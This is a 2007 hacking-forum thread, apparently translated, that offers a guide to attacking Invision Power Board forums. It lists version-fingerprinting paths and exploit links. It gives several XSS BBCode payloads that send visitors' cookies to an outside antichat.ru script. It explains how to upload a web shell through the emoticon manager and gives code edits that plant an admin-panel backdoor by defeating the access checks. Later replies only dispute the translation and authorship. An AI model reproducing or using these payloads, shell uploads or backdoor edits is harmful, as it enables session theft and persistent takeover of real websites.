IPB Vulnerabilities Review

Discussion in 'Forum for discussion of ANTICHAT' started by bx_N, 9 Mar 2007.

  1. bx_N

    bx_N Elder - Старейшина

    Joined:
    6 Mar 2007
    Messages:
    24
    Likes Received:
    14
    Reputations:
    1
    How to determine the forum version
    version Invision Power Board 1.3
    If there are such folders and files:
    /html/emoticons/
    /fonts/
    /Skin/
    /ssi_templates/
    Such files:
    ssi.php
    show.php
    css.php
    conf_mime_types.php
    version Invision Power Board 2.0.*
    If there are such folders and files:
    /sources/help.php
    /sources/usercp.php
    /sources/trial_functions.php
    /sources/topics.php
    /sources/taskloader.php
    shows error 403 "access forbidden" for example to the folder
    /ips_kernel/ as 403: Invision Power Board -> Forbidden
    version Invision Power Board 2.1.*
    If there are such folders and files:
    /ips_kernel/PEAR/
    Such files
    info.php
    shows 403 "accesses forbidden" for example to the folder
    /ips_kernel/ as 403: Invision Power Board -> Forbidden
    Exploits
    Version Invision Power Board 1.3.1 _http://milw0rm.com/id.php?id=1036
    Version Invision Power Board 1.* , 2.* (<2.0.4) _http://rst.void.ru/download/r57ipb2.txt
    Version Invision Power Board 2.0.0 - 2.0.2 _http://milw0rm.com/id.php?id=648
    Version Invision Power Board Army System Mod 2.1 _http://www.milw0rm.com/exploits/1492
    Version Invision Power Board 2.1.4 (Dos) _http://www.milw0rm.com/id.php?id=1489
    Version Invision Power Board <=2.1.5 (Remote code execution)
    http://forum.antichat.ru/thread18222.html
    XSS
    Do not use these codes with a sign "*". It is used so that these codes won't work on this forum.
    Code:
    [ema*il]wj@wj[u*rl=http://www.wj.com`=`][/url].com[/email] ` style=`background:url(javascript:document.images[1].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie);`
    Code:
    [HT*ML][EMA*IL][UR*L=wj`=`][/U*RL][/EM*AIL][/co*lor][color=wh*ite]` style=`backg*round:url(javascript:docu*ment.images   [1].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie)`[/c*olor]
    Code:
    [EMA*IL][email protected][U*RL=target/*style=background:url(javasc*ript:document.images[1].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie); ][/U*RL][/EM*AIL]
    Code:
    [po*st=1000[to*pic=target style=background:url(javascript:document.images[1].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie); ][/to*pic]][/po*st]
    Code:
    [em*ail][email protected][/email] ` style=`background:url(javascript:document.images[1].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie);`
    Code:
    [COLOR=[IМG]http://aaa.aa/=`aaa.jpg[/IMG]]` style=background:url(javascript:document.images[1].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie)
    Code:
    [EM*AIL][U*RL=wj`=`][/UR*L][/EM*AIL]]` style=`background:url(javascript:document.images[1].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie)`
    Load shell
    Invision Power Board 1.3
    Administration->Manage Emoticons->Upload an Emoticon to the emoticons directory
    Usually shell is uploaded in one of these folders, depending on a version, if your access is enough
    1.3 /forum/html/emoticons/shell.php
    2.* /forum/style_emoticons/default/shell.php
    where shell.php name your loaded shell
    Trojaning the
    forum

    Invision Power Board 1.3
    PHP:
    if ($GROUP['g_access_cp'] != 1)
    {
    do_login("You do not have access to the administrative CP");
    }
    else
    {
    $session_validated 1;
    $this_session $row;
    }
    and change to
    PHP:
    if ($GROUP['g_access_cp'] != || $GROUP['g_access_cp'] = 1)
    {

    $session_validated 1;
    $this_session $row;
    }
    and search lines (by default 442 line)
    PHP:
    if ($GROUP['g_access_cp'] != 1)
    {
    do_login("You do not have access to the administrative CP");
    }
    else
    {

    //----------------------------------
    // All is good, rejoice as we set a
    // session for this user
    //----------------------------------

    $sess_id md5uniqidmicrotime() ) );
    and change to
    PHP:
    if ($GROUP['g_access_cp'] != || $GROUP['g_access_cp'] = 1)

    {

    //----------------------------------
    // All is good, rejoice as we set a
    // session for this user
    //----------------------------------

    $sess_id md5uniqidmicrotime() ) );
    then we edit the file /sources/Admin/ad_mysql.php and delete lines
    PHP:
    if ($MEMBER['mgroup'] != $INFO['admin_group'])
    {
    $ADMIN->error("Sorry, these functions are for the root admin group only");
    }
    Invision Power Board 2.0.*
    /sources/action_admin/login.php
    by default 147 line
    and delete lines
    PHP:
    if ($mem['g_access_cp'] != 1)
    {
    $this->login_form("You do not have access to the administrative CP");
    }
    else
    {
    and in a line (by default 206) delete character "}" naturally without quotation marks.
    sql.php by default 46 line:
    we delete
    PHP:
    if ($this->ipsclass->member['mgroup'] != $this->ipsclass->vars['admin_group'])
    {
    $this->ipsclass->admin->error("Sorry, these functions are for the root admin group only");
    }
    then we go here
    /sources/lib/admin_functions.php (line 262)
    we change a line:
    PHP:
    $this->ipsclass->admin_session['_session_validated'] = 0;
    change to
    PHP:
    $this->ipsclass->admin_session['_session_validated'] = 1;
    then we delete lines in the file /sources/sql_mysql.php (by default 76 line)
    Code:
    if ($this->ipsclass->member['mgroup'] != $this->ipsclass->vars['admin_group'])
    {
    $this->ipsclass->admin->error("Sorry, these functions are for the root admin group only");
    }
    [CODE]
    Now we'll explain all this in details, when you call in admincp (not "troyaning"), verification of if ($GROUP['g_access_cp'] != 1) have you acces for admincp {
    do_login("you do not have access to the administrative CP");
    } 
    For the receipt of access it is necessary to change  this line of if ($GROUP['g_access_cp'] != 1) to if ($GROUP['g_access_cp'] != 1 || $GROUP['g_access_cp'] == 1 )
    --------------------
    Thanks [B]qBiN[/B]
    
    Original version here: http://forum.antichat.ru/thread11615.html
    by [b]k1b0rg[/b]
    
    [SIZE=1][edit: some mistakes were corrected (too tired to look more), real copyrights added]
    [/SIZE]
     
    #1 bx_N, 9 Mar 2007
    Last edited by a moderator: 9 Mar 2007
  2. NeMiNeM

    NeMiNeM Elder - Старейшина

    Joined:
    22 Aug 2005
    Messages:
    480
    Likes Received:
    310
    Reputations:
    201
    Did you use a translator? Plenty of mistakes...

    When I come back home, I'll correct your post. Check your translation next time please.
     
  3. bx_N

    bx_N Elder - Старейшина

    Joined:
    6 Mar 2007
    Messages:
    24
    Likes Received:
    14
    Reputations:
    1
    no, only a dictionary
     
  4. k1b0rg

    k1b0rg Тут может быть ваша реклама.

    Joined:
    30 Jul 2005
    Messages:
    1,182
    Likes Received:
    399
    Reputations:
    479
    Don't you think you've stolen my article?
    http://forum.antichat.ru/thread11615.html
     
    #4 k1b0rg, 9 Mar 2007
    Last edited by a moderator: 9 Mar 2007